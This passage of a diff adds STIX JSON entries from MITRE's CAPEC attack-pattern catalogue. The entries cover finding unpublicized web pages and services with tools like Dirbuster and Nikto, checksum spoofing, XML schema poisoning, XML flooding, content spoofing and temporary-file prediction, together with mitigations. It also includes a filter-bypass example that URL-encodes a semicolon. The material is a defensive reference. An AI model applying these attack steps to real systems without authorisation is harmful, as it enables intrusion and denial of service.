"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b310b70-cd48-479c-a4a6-1e9a513c96ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", + "id": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d75a59b5-0380-4139-9922-641a68593944", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side DNS caching.", + "id": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3632005-d0b9-4ed4-b5c5-337170c60644", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "spec_version": "2.1", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.", + "external_references": [ + { + "external_id": "CAPEC-143", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/143.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web pages

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

  3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized pages
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public

  2. Techniques
    Manually analyze files or pages for information that could be useful in a further attack
    Use a static analysis tool to find weaknesses in unpublished web pages

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include pages within its published tree that are not connected to its tree of links. The sensitivity of the content of these pages determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common page locations from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web services that have not been publicized. This attack can be especially dangerous since unpublished but available services may not have adequate security controls placed upon them given that an administrator may believe they are unreachable.", + "external_references": [ + { + "external_id": "CAPEC-144", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/144.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--af65cbd9-cc10-4c4f-9cc3-843941cdf357", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Services", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web services

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

  3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized web services
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses in the unpublicized services that the targeted site did not intend to be public

  2. Techniques
    Use Nikto to look for web service vulnerabilities

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

", + "x_capec_prerequisites": [ + "The targeted web site must include unpublished services within its web tree. The nature of these services determines the severity of this attack." + ], + "x_capec_resources_required": [ + "Spidering tools to explore the target web site are extremely useful in this attack especially when attacking large sites. Some tools might also be able to automatically construct common service queries from known paths." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary spoofs a checksum message for the purpose of making a payload appear to have a valid corresponding checksum. Checksums are used to verify message integrity. They consist of some value based on the value of the message they are protecting. Hash codes are a common checksum mechanism. Both the sender and recipient are able to compute the checksum based on the contents of the message. If the message contents change between the sender and recipient, the sender and recipient will compute different checksum values. Since the sender's checksum value is transmitted with the message, the recipient would know that a modification occurred. In checksum spoofing an adversary modifies the message body and then modifies the corresponding checksum so that the recipient's checksum calculation will match the checksum (created by the adversary) in the message. 
This would prevent the recipient from realizing that a change occurred.", + "external_references": [ + { + "external_id": "CAPEC-145", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/145.html" + }, + { + "external_id": "CWE-354", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/354.html" + } + ], + "id": "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Checksum Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The adversary must be able to intercept a message from the sender (keeping the recipient from getting it), modify it, and send the modified message to the recipient.", + "The sender and recipient must use a checksum to protect the integrity of their message and transmit this checksum in a manner where the adversary can intercept and modify it.", + "The checksum value must be computable using information known to the adversary. A cryptographic checksum, which uses a key known only to the sender and recipient, would thwart this attack." + ], + "x_capec_resources_required": [ + "The adversary must have a utility that can intercept and modify messages between the sender and recipient." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary corrupts or modifies the content of XML schema information passed between a client and server for the purpose of undermining the security of the target. 
XML Schemas provide the structure and content definitions for XML documents. Schema poisoning is the ability to manipulate a schema either by replacing or modifying it to compromise the programs that process documents that use this schema.", + "external_references": [ + { + "external_id": "CAPEC-146", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XML Schema Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--41cfbb50-1b96-4004-a42e-6e8d21dd6f87" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful schema poisoning attack can compromise the availability of the target system's service by exhausting its available resources.)" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n XML Schema Poisoning Attacks can often occur locally due to being embedded within the XML document itself or being located on the host within an improperaly protected file. In these cases, the adversary can simply edit the XML schema without the need for additional privileges. An example of the former can be seen below:\n ]> John Smith 555-1234 jsmith@email.com
1 Example Lane
\n If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.\n ", + "\n XML Schema Poisoning Attacks can also be executed remotely if the HTTP protocol is being used to transport data. :\n John Smith 555-1234 jsmith@email.com
1 Example Lane
\n The HTTP protocol does not encrypt the traffic it transports, so all communication occurs in plaintext. This traffic can be observed and modified by the adversary during transit to alter the XML schema before it reaches the end user. The adversary can perform a Adversary-in-the-Middle (CAPEC-94) Attack to alter the schema in the same way as the previous example and to acheive the same results.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine if XML schema is local or remote: Because this attack differs slightly if the target uses remote XML schemas versus local schemas, the adversary first needs to determine which of the two are used.

Experiment

  1. Gain access to XML schema: The adversary gains access to the XML schema so that they can modify the contents.

  2. Techniques
    For a local scenario, the adversary needs access to the machine that the schema is located on and needs to gain permissions to alter the contents of the file.
    For a remote scenario, the adversary needs to be able to sniff HTTP traffic that contains an XML schema.

Exploit

  1. Poison XML schema: Once the adversary gains access to the XML schema, they will alter it to achieve a desired effect. Locally, they can simply modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.

  2. Techniques
    Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing. For example, the unaltered schema may require a @name attribute in all submitted documents. If the adversary removes this attribute from the schema then documents created using the new grammar may lack this field, which may cause the processing application to enter an unexpected state or record incomplete data.
    Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.
    Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Some level of access to modify the target schema.", + "The schema used by the target application must be improperly secured against unauthorized modification and manipulation." + ], + "x_capec_resources_required": [ + "Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Protect the schema against unauthorized modification.", + "id": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aa8c2087-a10b-40c8-aa4d-00be4324dda2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36e13c8-5f07-493b-9093-bc3656142e52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the XML document. 
Additionally, ensure that the proper permissions are set on local files to avoid unauthorized modification.", + "id": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8075cef3-6e2d-40ac-9e91-b9a4e17b5460", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdd2a92c-5b73-40d3-ad60-b046cf2aa3de", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.", + "id": "course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-146-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03fec1aa-4921-455b-89f5-01af59405338", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--64ccbe5a-017d-44f3-9f60-79e90c24af52", + "spec_version": "2.1", + "target_ref": "attack-pattern--ebf4bdc7-73dd-47c4-96e1-1ff471efbcd2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.", + "external_references": [ + { + "external_id": "CAPEC-147", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/147.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XML Ping of the Death", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (DoS: resource consumption (other))" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider 
the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of small XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

  2. Techniques
    Send a large number of crafted small XML messages to the target URL.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The target must receive and process XML transactions." + ], + "x_capec_resources_required": [ + "Transaction generator(s)/source(s) and ability to cause arrival of messages at the target with sufficient rapidity to overload target. Larger targets may be able to handle large volumes of requests so the attacker may require significant resources (such as a distributed network) to affect the target. However, the resources required of the attacker would be less than in the case of a simple flooding attack against the same target." + ], + "x_capec_skills_required": { + "High": "To use distributed network to launch the attack", + "Low": "To send small XML messages" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Build throttling mechanism into the resource allocation. 
Provide for a timeout mechanism for allocated resources whose transaction does not complete within a specified interval.", + "id": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cfd5f6e5-9782-45a5-9d8c-a1883c4b6d34", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "spec_version": "2.1", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Provide for network flow control and traffic shaping to control access to the resources.", + "id": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-147-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2d06b870-3a8b-4f06-aa89-258fb7aec1e8", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + 
"spec_version": "2.1", + "target_ref": "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies content to make it contain something other than what the original content producer intended while keeping the apparent source of the content unchanged. The term content spoofing is most often used to describe modification of web pages hosted by a target to display the adversary's content instead of the owner's content. However, any content can be spoofed, including the content of email messages, file transfers, or the content of other network communication protocols. Content can be modified at the source (e.g. modifying the source file for a web page) or in transit (e.g. intercepting and modifying a message between the sender and recipient). Usually, the adversary will attempt to hide the fact that the content has been modified, but in some cases, such as with web site defacement, this is not necessary. 
Content Spoofing can lead to malware exposure, financial fraud (if the content governs financial transactions), privacy violations, and other unwanted outcomes.", + "external_references": [ + { + "external_id": "CAPEC-148", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/148.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "description": "Defacement", + "external_id": "T1491", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1491" + }, + { + "description": "Content Spoofing", + "external_id": "12", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Content-Spoofing" + }, + { + "description": "Content Spoofing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Content_Spoofing" + } + ], + "id": "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Content Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b", + "attack-pattern--3491dd54-d586-4f3d-80c1-9576ee48236b" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data (A successful content spoofing attack compromises the integrity of the application data.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--9d8a9dc3-5115-43c3-a5ec-8003e7b97b2e", + 
"attack-pattern--e7c0cce1-203e-454d-8a9a-76fa7ca120f8", + "attack-pattern--b2e8de4b-6757-4e7e-9c5c-210c44100577", + "attack-pattern--2e1be870-6442-4978-9a30-46d518aa1f74" + ], + "x_capec_prerequisites": [ + "The target must provide content but fail to adequately protect it against modification.The adversary must have the means to alter data to which they are not authorized. If the content is to be modified in transit, the adversary must be able to intercept the targeted messages." + ], + "x_capec_resources_required": [ + "\n If the content is to be modified in transit, the adversary requires a tool capable of intercepting the target's communication and generating/creating custom packets to impact the communications.\n In some variants, the targeted content is altered so that all or some of it is redirected towards content published by the attacker (for example, images and frames in the target's web site might be modified to be loaded from a source controlled by the attacker). In these cases, the attacker requires the necessary resources to host the replacement content.\n " + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker explores a target to identify the names and locations of predictable temporary files for the purpose of launching further attacks against the target. This involves analyzing naming conventions and storage locations of the temporary files created by a target application. 
If an attacker can predict the names of temporary files they can use this information to mount other attacks, such as information gathering and symlink attacks.", + "external_references": [ + { + "external_id": "CAPEC-149", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/149.html" + }, + { + "external_id": "CWE-377", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/377.html" + } + ], + "id": "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Explore for Predictable Temporary File Names", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--7fea6e82-183a-4811-9b71-1ebe4d6c8b11" + ], + "x_capec_child_of_refs": [ + "attack-pattern--323ed142-7793-413d-838f-72626caf58da" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted application must create names for temporary files using a predictable procedure, e.g. using sequentially increasing numbers.", + "The attacker must be able to see the names of the files the target is creating." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. 
The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.", + "external_references": [ + { + "external_id": "CAPEC-15", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/15.html" + }, + { + "external_id": "CWE-146", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/146.html" + }, + { + "external_id": "CWE-77", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-93", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-140", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-157", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/157.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-154", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/154.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
